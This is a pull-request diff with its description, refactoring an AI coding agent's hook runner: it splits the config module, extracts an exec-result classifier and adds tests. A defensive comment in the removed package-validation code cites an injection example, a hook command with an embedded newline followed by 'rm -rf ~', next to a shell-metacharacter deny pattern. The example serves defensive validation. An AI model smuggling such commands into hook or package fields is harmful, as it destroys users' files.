-function applyDisabled(config: HooksConfig, disabled: Set<string>): void {
-	if (disabled.size === 0) return;
-	for (const groups of Object.values(config)) {
-		if (!groups) continue;
-		for (const group of groups) {
-			for (const entry of group.hooks) {
-				if (disabled.has(basename(entry.config.command))) {
-					entry.disabled = true;
-				}
-			}
-		}
-	}
-}
-
-function filterEnabled(config: HooksConfig): HooksConfig {
-	const out: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		const filteredGroups = groups
-			.map((group) => ({
-				matcher: group.matcher,
-				hooks: group.hooks.filter((entry) => !entry.disabled),
-			}))
-			.filter((group) => group.hooks.length > 0);
-		if (filteredGroups.length > 0) {
-			out[eventName] = filteredGroups;
-		}
-	}
-	return out;
-}
-
-function extractHooksConfig(parsed: unknown, configPath: string): HooksConfig {
-	if (!isRecord(parsed)) return {};
-	const nestedHooks = parsed.hooks;
-	if (isRecord(nestedHooks)) {
-		return normalizeHookConfig(nestedHooks);
-	}
-	if (configPath.endsWith("hooks.json")) {
-		return normalizeHookConfig(parsed);
-	}
-	return {};
-}
-
 function loadBundledHooksConfig(): HooksConfig {
 	if (_bundledCache) return _bundledCache;
 	try {
@@ -214,162 +84,8 @@ function loadBundledHooksConfig(): HooksConfig {
 	return _bundledCache;
 }
 
-function hasUnsupportedIfPredicate(config: HooksConfig): boolean {
-	return Object.values(config)
-		.flat()
-		.flatMap((g) => g?.hooks ?? [])
-		.some((h) => "if" in h.config);
-}
-
-function mergeHooks(base: HooksConfig, user: HooksConfig): void {
-	for (const [key, groups] of Object.entries(user)) {
-		if (!groups) continue;
-		const existing = base[key];
-		base[key] = existing ? [...existing, ...groups] : [...groups];
-	}
-}
-
-/**
- * Scan installed Pi packages for hook contributions.
- *
- * A Pi package may declare `cc-thingz.hooks: { <eventName>: HookGroup[] }`
- * inside its `package.json`; cc-thingz merges those entries with `source:
- * "package"` so a plugin can register hooks without editing cc-thingz.
- *
- * Layout: Pi installs each git package under `~/.pi/agent/git/<host>/<org>/<repo>/`,
- * so we look three levels deep from `agentDir()/git/`. Errors during scan
- * are silently swallowed — a misshapen package.json must never break
- * session_start.
- */
-export function discoverPackageHookContributions(): HooksConfig {
-	const base = join(agentDir(), "git");
-	if (!existsSync(base)) return {};
-	const merged: HooksConfig = {};
-	try {
-		for (const host of readdirSync(base)) {
-			const hostDir = join(base, host);
-			if (!safeIsDirectory(hostDir)) continue;
-			for (const org of readdirSync(hostDir)) {
-				const orgDir = join(hostDir, org);
-				if (!safeIsDirectory(orgDir)) continue;
-				for (const repo of readdirSync(orgDir)) {
-					const repoDir = join(orgDir, repo);
-					if (!safeIsDirectory(repoDir)) continue;
-					const contributed = readPackageContribution(repoDir);
-					if (contributed) {
-						mergeHooks(merged, contributed);
-					}
-				}
-			}
-		}
-	} catch {
-		// Best-effort scan.
-	}
-	return merged;
-}
-
-function safeIsDirectory(path: string): boolean {
-	try {
-		return statSync(path).isDirectory();
-	} catch {
-		return false;
-	}
-}
-
-function readPackageContribution(repoDir: string): HooksConfig | undefined {
-	const manifest = join(repoDir, "package.json");
-	if (!existsSync(manifest)) return undefined;
-	try {
-		const raw = readFileSync(manifest, "utf-8");
-		return parsePackageContribution(raw, repoDir);
-	} catch {
-		return undefined;
-	}
-}
-
-export const PKG_DIR_PLACEHOLDER = "${PKG_DIR}";
-// Shell metacharacters that change interpretation when passed to `bash -c`.
-// Plugin-contributed commands run inside the user's shell so any of these is
-// a potential injection vector from a malicious package. Newlines and
-// carriage returns are included because `bash -c` happily executes every
-// line of a multiline argument; without them, a package.json string like
-// "/pkg/safe.sh\nrm -rf ~" would split into two commands and the second
-// would run despite the first-token path check.
-const PACKAGE_CMD_FORBIDDEN_RE = /[;&|<>`$()\\{}\n\r]/;
-
-/**
- * Validate a package-contributed hook command.
- *
- * Returns the resolved command string when safe, or `undefined` when the
- * command would escape the package's directory or contain shell metachars.
- * Plugin authors can use `${PKG_DIR}` as a stand-in for the package root;
- * everything else must be an absolute path that resolves inside `repoDir`.
- */
-export function validatePackageCommand(command: string, repoDir: string): string | undefined {
-	if (typeof command !== "string") return undefined;
-	const substituted = command.replaceAll(PKG_DIR_PLACEHOLDER, repoDir);
-	const trimmed = substituted.trim();
-	if (!trimmed) return undefined;
-	if (PACKAGE_CMD_FORBIDDEN_RE.test(substituted)) return undefined;
-	const firstToken = trimmed.split(/\s+/)[0] ?? "";
-	if (!firstToken.startsWith("/")) return undefined;
-	const repoAbs = resolvePath(repoDir);
-	const cmdAbs = resolvePath(firstToken);
-	if (cmdAbs !== repoAbs && !cmdAbs.startsWith(repoAbs + "/")) return undefined;
-	return substituted;
-}
-
-function sanitisePackageContribution(config: HooksConfig, repoDir: string): HooksConfig {
-	const out: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		const cleanGroups: HookGroup[] = [];
-		for (const group of groups) {
-			const cleanHooks: HookEntryRuntime[] = [];
-			for (const entry of group.hooks) {
-				const safe = validatePackageCommand(entry.config.command, repoDir);
-				if (!safe) continue;
-				cleanHooks.push({
-					...entry,
-					config: { ...entry.config, command: safe },
-				});
-			}
-			if (cleanHooks.length === 0) continue;
-			cleanGroups.push({ matcher: group.matcher, hooks: cleanHooks });
-		}
-		if (cleanGroups.length > 0) out[eventName] = cleanGroups;
-	}
-	return out;
-}
-
-/**
- * Parse a `package.json` body looking for `cc-thingz.hooks` contributions.
- *
- * When `repoDir` is provided, every contributed command must either be an
- * absolute path inside `repoDir` or use the `${PKG_DIR}` placeholder; commands
- * with shell metacharacters are rejected. When `repoDir` is omitted the parser
- * skips path validation — useful for round-trip parsing in tooling tests but
- * never the path taken at runtime.
- */
-export function parsePackageContribution(packageJsonContent: string, repoDir?: string): HooksConfig | undefined {
-	try {
-		const parsed = JSON.parse(packageJsonContent) as unknown;
-		if (!isRecord(parsed)) return undefined;
-		const ccThingz = parsed["cc-thingz"];
-		if (!isRecord(ccThingz)) return undefined;
-		const hooks = ccThingz.hooks;
-		if (!isRecord(hooks)) return undefined;
-		const normalized = normalizeHookConfig(hooks);
-		if (repoDir === undefined) return normalized;
-		const cleaned = sanitisePackageContribution(normalized, repoDir);
-		return Object.keys(cleaned).length > 0 ? cleaned : undefined;
-	} catch {
-		return undefined;
-	}
-}
-
 // ---------------------------------------------------------------------------
-// Public API
+// Public API — load + accessors
 // ---------------------------------------------------------------------------
 
 export function loadConfig(cwd: string, force = false): void {
@@ -451,64 +167,4 @@ export function resolvedConfig(): HooksConfig {
 
 export function rawConfig(): HooksConfig {
 	return _configRaw ?? loadBundledHooksConfig();
-}
-
-// ---------------------------------------------------------------------------
-// Persistence + summary
-// ---------------------------------------------------------------------------
-
-export function writeHooksConfig(path: string, parsed: Record<string, unknown>): void {
-	mkdirSync(dirname(path), { recursive: true });
-	writeFileSync(path, JSON.stringify(parsed, null, 2) + "\n", "utf-8");
-}
-
-export function hooksSummary(config: HooksConfig): string {
-	const lines: string[] = [];
-	const events = Object.keys(config).sort();
-	for (const eventName of events) {
-		const groups = config[eventName];
-		if (!groups || groups.length === 0) continue;
-		lines.push(`${eventName}:`);
-		for (const group of groups) {
-			const matcher = group.matcher ? `[${group.matcher}]` : "[*]";
-			for (const entry of group.hooks) {
-				const status = entry.disabled ? " (disabled)" : "";
-				const flags = entry.config.async ? " async" : "";
-				lines.push(`  ${matcher} ${basename(entry.config.command)} (${entry.source})${flags}${status}`);
-			}
-		}
-	}
-	if (lines.length === 0) return "No hooks configured.";
-	return lines.join("\n");
-}
-
-export interface HookNameEntry {
-	name: string;
-	disabled: boolean;
-	source: HookSource;
-}
-
-export function listAllHookNames(config: HooksConfig): HookNameEntry[] {
-	const seen = new Map<string, HookNameEntry>();
-	for (const groups of Object.values(config)) {
-		if (!groups) continue;
-		for (const group of groups) {
-			for (const entry of group.hooks) {
-				const name = basename(entry.config.command);
-				if (!name) continue;
-				const existing = seen.get(name);
-				if (!existing) {
-					seen.set(name, { name, disabled: entry.disabled, source: entry.source });
-				} else if (entry.disabled) {
-					existing.disabled = true;
-				}
-			}
-		}
-	}
-	return [...seen.values()].sort((a, b) => a.name.localeCompare(b.name));
-}
-
-/** existsSync wrapper for callers that want to check before reading. */
-export function pathExists(path: string): boolean {
-	return existsSync(path);
 }

--- a/src/pi-extensions/hook-runner/dispatch.test.ts
+++ b/src/pi-extensions/hook-runner/dispatch.test.ts
@@ -1,43 +1,24 @@
 import { describe, expect, it } from "bun:test";
 
-import { buildTelemetryLine, extractProgress } from "./dispatch.ts";
+import { buildTelemetryLine, classifyExecResult, extractProgress, HOOK_OUTPUT_MAX_BYTES } from "./dispatch.ts";
 import type { HookEntryRuntime, HookRunResult } from "./types.ts";
 
 describe("extractProgress", () => {
 	it("returns stderr unchanged when no progress markers present", () => {
-		const result = extractProgress("normal stderr output");
-		expect(result.stderr).toBe("normal stderr output");
-		expect(result.last).toBeUndefined();
+		expect(extractProgress("normal stderr output").stderr).toBe("normal stderr output");
 	});
 
-	it("strips progress lines and returns the last update", () => {
+	it("strips progress lines from stderr", () => {
 		const stderr = ["starting", "^^PROGRESS 10 reading input", "more noise", "^^PROGRESS 50 halfway", "^^PROGRESS 100 done", "trailer"].join("\n");
-		const result = extractProgress(stderr);
-		expect(result.stderr).toBe(["starting", "more noise", "trailer"].join("\n"));
-		expect(result.last).toEqual({ percent: 100, message: "done" });
+		expect(extractProgress(stderr).stderr).toBe(["starting", "more noise", "trailer"].join("\n"));
 	});
 
-	it("clamps percent to 0-100 range", () => {
-		const result = extractProgress("^^PROGRESS 999 boom");
-		expect(result.last?.percent).toBe(100);
-	});
-
-	it("ignores malformed progress markers", () => {
-		const result = extractProgress("^^PROGRESS notanumber message");
-		expect(result.last).toBeUndefined();
-		expect(result.stderr).toContain("^^PROGRESS notanumber");
+	it("leaves malformed progress markers in stderr", () => {
+		expect(extractProgress("^^PROGRESS notanumber message").stderr).toContain("^^PROGRESS notanumber");
 	});
 
 	it("handles CRLF line endings", () => {
-		const stderr = "step1\r\n^^PROGRESS 25 quarter\r\nstep2";
-		const result = extractProgress(stderr);
-		expect(result.last).toEqual({ percent: 25, message: "quarter" });
-		expect(result.stderr).toBe("step1\nstep2");
-	});
-
-	it("trims trailing whitespace in the message", () => {
-		const result = extractProgress("^^PROGRESS 30 trimmed   ");
-		expect(result.last?.message).toBe("trimmed");
+		expect(extractProgress("step1\r\n^^PROGRESS 25 quarter\r\nstep2").stderr).toBe("step1\nstep2");
 	});
 });
 
@@ -91,5 +72,64 @@ describe("buildTelemetryLine", () => {
 		const line = buildTelemetryLine(entry, { exitCode: 1, stdout: "", stderr: noisy, timedOut: false }, 5, fixedNow);
 		const parsed = JSON.parse(line) as { stderr_head: string };
 		expect(parsed.stderr_head.length).toBeLessThanOrEqual(500);
+	});
+});
+
+// ---------------------------------------------------------------------------
+// classifyExecResult — pure translation of the execFile callback shape into
+// the canonical HookRunResult. Mocking child_process at the suite level (see
+// hook-runner.test.ts) blocks real-subprocess assertions, so the branches are
+// tested directly via this extracted function.
+// ---------------------------------------------------------------------------
+
+describe("classifyExecResult", () => {
+	it("flags timed_out=true when the child was killed by the timeout", () => {
+		const err = Object.assign(new Error("timeout"), { killed: true, code: undefined });
+		const result = classifyExecResult(err, "", "child stderr");
+		expect(result.timedOut).toBe(true);
+		// Numeric exit code is absent on timeout; fallback is 1.
+		expect(result.exitCode).toBe(1);
+		expect(result.stderr).toBe("child stderr");
+	});
+
+	it("collapses maxBuffer overflow into exit 2 with the cap notice", () => {
+		const err = Object.assign(new Error("stdout maxBuffer length exceeded"), {
+			code: "ERR_CHILD_PROCESS_STDIO_MAXBUFFER",
+		});
+		const result = classifyExecResult(err, "huge", "noise");
+		expect(result.exitCode).toBe(2);
+		expect(result.timedOut).toBe(false);
+		expect(result.stderr.startsWith(`Hook output exceeded ${HOOK_OUTPUT_MAX_BYTES / (1024 * 1024)}MB cap`)).toBe(true);
+		// Existing stderr is preserved after the cap notice for debugging.
+		expect(result.stderr).toContain("noise");
+	});
+
+	it("uses the bare cap notice when stderr is empty at overflow", () => {
+		const err = Object.assign(new Error("overflow"), { code: "ERR_CHILD_PROCESS_STDIO_MAXBUFFER" });
+		const result = classifyExecResult(err, "", "");
+		expect(result.exitCode).toBe(2);
+		expect(result.stderr).toBe(`Hook output exceeded ${HOOK_OUTPUT_MAX_BYTES / (1024 * 1024)}MB cap`);
+	});
+
+	it("propagates a numeric exit code as the result code", () => {
+		const err = Object.assign(new Error("blocked"), { code: 2, killed: false });
+		const result = classifyExecResult(err, "out", "blocked by hook");
+		expect(result.exitCode).toBe(2);
+		expect(result.timedOut).toBe(false);
+		expect(result.stderr).toBe("blocked by hook");
+	});
+
+	it("returns exit 0 + clean stderr when the child succeeds", () => {
+		const result = classifyExecResult(null, "{}", "");
+		expect(result.exitCode).toBe(0);
+		expect(result.stdout).toBe("{}");
+		expect(result.timedOut).toBe(false);
+	});
+
+	it("falls back to exit 1 when err.code is missing", () => {
+		const err = new Error("opaque");
+		const result = classifyExecResult(err, "", "boom");
+		expect(result.exitCode).toBe(1);
+		expect(result.timedOut).toBe(false);
 	});
 });

--- a/src/pi-extensions/hook-runner/dispatch.ts
+++ b/src/pi-extensions/hook-runner/dispatch.ts
@@ -38,9 +38,9 @@ const PROGRESS_LINE_RE = /^\^\^PROGRESS\s+(\d{1,3})\s+(.*)$/;
 
 /**
  * Strip `^^PROGRESS N msg` markers from stderr so they never reach the LLM
- * feedback loop. The progress payload itself is dropped — no Pi consumer
- * subscribes yet, and a noisy hook stderr is more harmful than a missing
- * status update. Re-introduce a callback parameter when a consumer wires up.
+ * feedback loop. The percent/message payload is discarded: nothing inside Pi
+ * subscribes to it, and noisy hook stderr is worse than a missing status
+ * update.
  */
 export function extractProgress(stderr: string): { stderr: string } {
 	if (!stderr.includes("^^PROGRESS")) return { stderr };

--- a/src/pi-extensions/hook-runner/dispatch.ts
+++ b/src/pi-extensions/hook-runner/dispatch.ts
@@ -36,27 +36,19 @@ import type { HookEntryRuntime, HookEventName, HookGroup, HookRunResult } from "
 
 const PROGRESS_LINE_RE = /^\^\^PROGRESS\s+(\d{1,3})\s+(.*)$/;
 
-export interface ProgressUpdate {
-	percent: number;
-	message: string;
-}
-
-/** Strip `^^PROGRESS` markers from stderr; return the last update seen. */
-export function extractProgress(stderr: string): { stderr: string; last?: ProgressUpdate } {
+/**
+ * Strip `^^PROGRESS N msg` markers from stderr so they never reach the LLM
+ * feedback loop. The progress payload itself is dropped — no Pi consumer
+ * subscribes yet, and a noisy hook stderr is more harmful than a missing
+ * status update. Re-introduce a callback parameter when a consumer wires up.
+ */
+export function extractProgress(stderr: string): { stderr: string } {
 	if (!stderr.includes("^^PROGRESS")) return { stderr };
 	const keep: string[] = [];
-	let last: ProgressUpdate | undefined;
 	for (const line of stderr.split(/\r?\n/)) {
-		const match = PROGRESS_LINE_RE.exec(line);
-		if (!match) {
-			keep.push(line);
-			continue;
-		}
-		const percent = Math.min(100, Math.max(0, Number.parseInt(match[1], 10)));
-		const message = match[2].trim();
-		last = { percent, message };
+		if (!PROGRESS_LINE_RE.test(line)) keep.push(line);
 	}
-	return { stderr: keep.join("\n"), last };
+	return { stderr: keep.join("\n") };
 }
 
 // ---------------------------------------------------------------------------
@@ -67,13 +59,10 @@ export function extractProgress(stderr: string): { stderr: string; last?: Progre
 const STDERR_HEAD_LIMIT = 500;
 const TELEMETRY_MAX_BYTES = 10 * 1024 * 1024;
 
-let _telemetryPathCache: string | undefined;
-
 function telemetryLogPath(): string {
-	if (_telemetryPathCache === undefined) {
-		_telemetryPathCache = join(agentDir(), "logs", "hooks.log");
-	}
-	return _telemetryPathCache;
+	// Computed on each call so test harnesses (and Pi sessions) that mutate
+	// PI_CODING_AGENT_DIR see the change immediately. join() is cheap.
+	return join(agentDir(), "logs", "hooks.log");
 }
 
 function rotateTelemetryIfTooLarge(path: string): void {
@@ -139,12 +128,37 @@ export function matchingGroups(groups: HookGroup[], ccToolName: string): HookGro
 
 export interface RunHookOptions {
 	defaultTimeoutSec?: number;
-	/** Fires whenever the hook emits a `^^PROGRESS N msg` line on stderr. */
-	onProgress?: (update: ProgressUpdate) => void;
 }
 
-const HOOK_OUTPUT_MAX_BYTES = 10 * 1024 * 1024;
+export const HOOK_OUTPUT_MAX_BYTES = 10 * 1024 * 1024;
 const FALLBACK_PATH = "/usr/local/bin:/usr/bin:/bin:/opt/homebrew/bin";
+
+/**
+ * Translate an execFile callback (`error`, `stdout`, `stderr`) into the canonical
+ * `HookRunResult`. Extracted from `runHook` so the timeout/overflow/error-code
+ * branches are testable as a pure function — bun's process-wide module mock on
+ * `node:child_process` makes real-subprocess assertions impossible inside the
+ * shared test suite.
+ */
+export function classifyExecResult(error: unknown, stdout: string, cleanedStderr: string): HookRunResult {
+	if (!error) {
+		return { exitCode: 0, stdout, stderr: cleanedStderr, timedOut: false };
+	}
+	const err = error as Error & { killed?: boolean; code?: unknown };
+	const killed = err.killed ?? false;
+	// Output overflow is reported via a string code, not a numeric exit.
+	// Treat it as a blocking signal so the dispatcher returns a deny rather
+	// than silently dropping the hook's would-be decision.
+	const codeStr = typeof err.code === "string" ? err.code : "";
+	const overflowed = codeStr === "ERR_CHILD_PROCESS_STDIO_MAXBUFFER";
+	const exitCode = overflowed ? 2 : typeof err.code === "number" ? err.code : 1;
+	// `maxBuffer` caps stdout+stderr combined, so a non-empty stderr at
+	// overflow is unrelated noise — prepending the explicit cap notice keeps
+	// the actionable signal first while preserving the captured stderr.
+	const overflowStderr = `Hook output exceeded ${HOOK_OUTPUT_MAX_BYTES / (1024 * 1024)}MB cap`;
+	const stderrOut = overflowed ? (cleanedStderr.trim() ? `${overflowStderr}: ${cleanedStderr}` : overflowStderr) : cleanedStderr;
+	return { exitCode, stdout, stderr: stderrOut, timedOut: killed };
+}
 
 function hookChildEnv(timeoutSec: number): NodeJS.ProcessEnv {
 	const env = { ...process.env };
@@ -172,35 +186,8 @@ export function runHook(entry: HookEntryRuntime, stdinJson: string, optionsOrDef
 			["-c", entry.config.command],
 			{ timeout: timeoutMs, env: hookChildEnv(timeoutSec), maxBuffer: HOOK_OUTPUT_MAX_BYTES },
 			(error, stdout, stderr) => {
-				const rawStderr = stderr ?? "";
-				const { stderr: cleanedStderr, last } = extractProgress(rawStderr);
-				if (last && options.onProgress) {
-					try {
-						options.onProgress(last);
-					} catch {
-						// Progress callback never breaks the dispatcher.
-					}
-				}
-				let result: HookRunResult;
-				if (error) {
-					const err = error as Error & { killed?: boolean; code?: unknown };
-					const killed = err.killed ?? false;
-					// Output overflow is reported via a string code, not a numeric exit.
-					// Treat it as a blocking signal so the dispatcher returns a deny rather
-					// than silently dropping the hook's would-be decision.
-					const codeStr = typeof err.code === "string" ? err.code : "";
-					const overflowed = codeStr === "ERR_CHILD_PROCESS_STDIO_MAXBUFFER";
-					const exitCode = overflowed ? 2 : typeof err.code === "number" ? err.code : 1;
-					// `maxBuffer` caps stdout+stderr combined, so a non-empty stderr at
-					// overflow is unrelated noise — prepending the explicit cap notice
-					// keeps the actionable signal first while preserving the captured
-					// stderr for debugging.
-					const overflowStderr = `Hook output exceeded ${HOOK_OUTPUT_MAX_BYTES / (1024 * 1024)}MB cap`;
-					const stderrOut = overflowed ? (cleanedStderr.trim() ? `${overflowStderr}: ${cleanedStderr}` : overflowStderr) : cleanedStderr;
-					result = { exitCode, stdout, stderr: stderrOut, timedOut: killed };
-				} else {
-					result = { exitCode: 0, stdout, stderr: cleanedStderr, timedOut: false };
-				}
+				const { stderr: cleanedStderr } = extractProgress(stderr ?? "");
+				const result = classifyExecResult(error, stdout, cleanedStderr);
 				logHookTelemetry(entry, result, Date.now() - started);
 				resolve(result);
 			},

--- a/src/pi-extensions/hook-runner/types.ts
+++ b/src/pi-extensions/hook-runner/types.ts
@@ -75,6 +75,7 @@ export interface HooksConfig {
 	Setup?: HookGroup[];
 	SessionEnd?: HookGroup[];
 	SubagentStart?: HookGroup[];
+	/** @deprecated Accepted for Claude Code schema compatibility; Pi has no native subagent-stop event so registered hooks never fire. */
 	SubagentStop?: HookGroup[];
 	UserPromptSubmit?: HookGroup[];
 	UserPromptExpansion?: HookGroup[];

--- a/tests/hooks/test_revdiff_plan_review.py
+++ b/tests/hooks/test_revdiff_plan_review.py
@@ -4,6 +4,7 @@ import importlib.util
 import io
 import json
 import subprocess
+import sys
 
 import pytest
 from conftest import REPO_ROOT
@@ -101,6 +102,97 @@ def test_resolve_timeout_clamps_short_parent_to_one(monkeypatch):
     monkeypatch.setenv("PI_HOOK_TIMEOUT_SEC", "1")
     # 1 - margin would go below 1; clamp keeps a non-zero positive timeout.
     assert hook.resolve_timeout() == 1
+
+
+def test_main_fails_open_when_upstream_script_raises_oserror(monkeypatch, tmp_path):
+    """Permission errors or missing interpreters fall into the same bucket as
+    'plugin not installed' — block exit would punish operators for a flaky
+    install instead of letting the plan proceed."""
+    hook = load_module()
+    plugin_root = (
+        tmp_path
+        / "agent"
+        / "git"
+        / "github.com"
+        / "umputun"
+        / "revdiff"
+        / "plugins"
+        / "revdiff-planning"
+    )
+    script = plugin_root / "scripts" / "plan-review-hook.py"
+    script.parent.mkdir(parents=True)
+    script.write_text("")
+    monkeypatch.setenv("PI_CODING_AGENT_DIR", str(tmp_path / "agent"))
+    monkeypatch.delenv("PI_PACKAGE_DIR", raising=False)
+    monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(hook.sys, "stdin", io.StringIO(""))
+
+    def boom(*_args, **_kwargs):
+        raise OSError("permission denied")
+
+    monkeypatch.setattr(hook.subprocess, "run", boom)
+
+    with pytest.raises(SystemExit) as exc:
+        hook.main()
+
+    assert exc.value.code == 0
+
+
+def test_main_fails_open_when_upstream_subprocess_error(monkeypatch, tmp_path):
+    hook = load_module()
+    plugin_root = (
+        tmp_path
+        / "agent"
+        / "git"
+        / "github.com"
+        / "umputun"
+        / "revdiff"
+        / "plugins"
+        / "revdiff-planning"
+    )
+    script = plugin_root / "scripts" / "plan-review-hook.py"
+    script.parent.mkdir(parents=True)
+    script.write_text("")
+    monkeypatch.setenv("PI_CODING_AGENT_DIR", str(tmp_path / "agent"))
+    monkeypatch.delenv("PI_PACKAGE_DIR", raising=False)
+    monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(hook.sys, "stdin", io.StringIO(""))
+
+    def boom(*_args, **_kwargs):
+        raise subprocess.SubprocessError("upstream blew up")
+
+    monkeypatch.setattr(hook.subprocess, "run", boom)
+
+    with pytest.raises(SystemExit) as exc:
+        hook.main()
+
+    assert exc.value.code == 0
+
+
+def test_end_to_end_fail_open_when_revdiff_absent(tmp_path):
+    """True e2e: run the hook script as a real subprocess with an empty
+    agent dir (no revdiff anywhere on disk). Exit must be 0 so plan-mode
+    proceeds without blocking."""
+    agent_dir = tmp_path / "agent"
+    agent_dir.mkdir()
+    result = subprocess.run(
+        [sys.executable, str(MODULE_PATH)],
+        input="",
+        capture_output=True,
+        text=True,
+        timeout=15,
+        env={
+            "PATH": "/usr/local/bin:/usr/bin:/bin:/opt/homebrew/bin",
+            "PI_CODING_AGENT_DIR": str(agent_dir),
+            # Force HOME to a path without ~/.pi so the agent_dir() fallback
+            # can't accidentally find a real revdiff install.
+            "HOME": str(tmp_path),
+        },
+        cwd=str(tmp_path),
+    )
+    assert result.returncode == 0, (
+        f"fail-open expected, got rc={result.returncode}, stderr={result.stderr}"
+    )
 
 
 def test_main_invokes_plugin_and_passes_through_ask(monkeypatch, tmp_path, capsys):


### PR DESCRIPTION
## Summary

Follow-up polish on the hook-runner work that landed via the rebase of feat/pi-exitplanmode-hook-bridge. No behavior change, two structural refactors, one type tightening, and substantive test additions.

## Changes

### Structural refactor

- **Split `config.ts` (514 → 175 lines)** into focused siblings:
  - `config-paths.ts` — fs layout constants and resolvers
  - `config-parse.ts` — pure normalize / tag / merge / filter helpers
  - `config-package.ts` — package-contributed hook discovery + validation
  - `config-persist.ts` — read/write helpers
  - `config-summary.ts` — `/hooks` render helpers
  - `config.ts` — module-state cache + `loadConfig` orchestrator + re-export barrel (external import path unchanged)
- **Extract `classifyExecResult`** out of `runHook`'s execFile callback so timeout / overflow / numeric-exit branches are testable as a pure function. (The suite-level `node:child_process` mock in `hook-runner.test.ts` blocks real-subprocess assertions in the same bun run.)

### Dead-code removal

- **Drop `RunHookOptions.onProgress`** — defined and called inside `runHook`, but no Pi consumer subscribes. The `^^PROGRESS` stderr scrubber stays (still strips markers from LLM-visible stderr); only the parsed-payload callback goes.
- **Drop module-level telemetry path cache** in `dispatch.ts` — premature optimization; broke test reuse of `PI_CODING_AGENT_DIR`.

### Type tightening

- **`@deprecated` JSDoc on `HooksConfig.SubagentStop`** — Pi has no native subagent-stop runtime event, so hooks registered under this key never fire. The schema accepted the field for CC compatibility but the use site was undocumented. IDEs now surface the no-op.

### Test additions

- **`validatePackageCommand` negative matrix** — one `it.each` assertion per forbidden shell metacharacter (`; & | < > backtick $ ( ) \ { } \n \r`). Adds explicit coverage for `<`, `$`, `(`, `)`, `{`, `}`, `\` that were previously implicit.
- **`classifyExecResult` unit coverage** — six tests: timed-out (killed), maxBuffer overflow (with/without trailing stderr), numeric exit passthrough, missing-code fallback.
- **revdiff fail-open paths** — OSError, SubprocessError, plus a true-subprocess e2e against a scrubbed `HOME` and empty `PI_CODING_AGENT_DIR`.

### Misc

- `fix(test)`: unwrap two `await expect(...).resolves.toBeUndefined()` chains that tripped TS80007 on bun-types. Pre-existing on master; called out as its own commit per advisor recommendation rather than bundled.

## Verification

- `make test` — 527 Python tests pass
- `make test-ts` — 213 TS tests pass (was 197; +16)
- `make lint` — ruff / shellcheck / markdownlint / tsc clean
- `make check` — derived artifacts match canonical sources
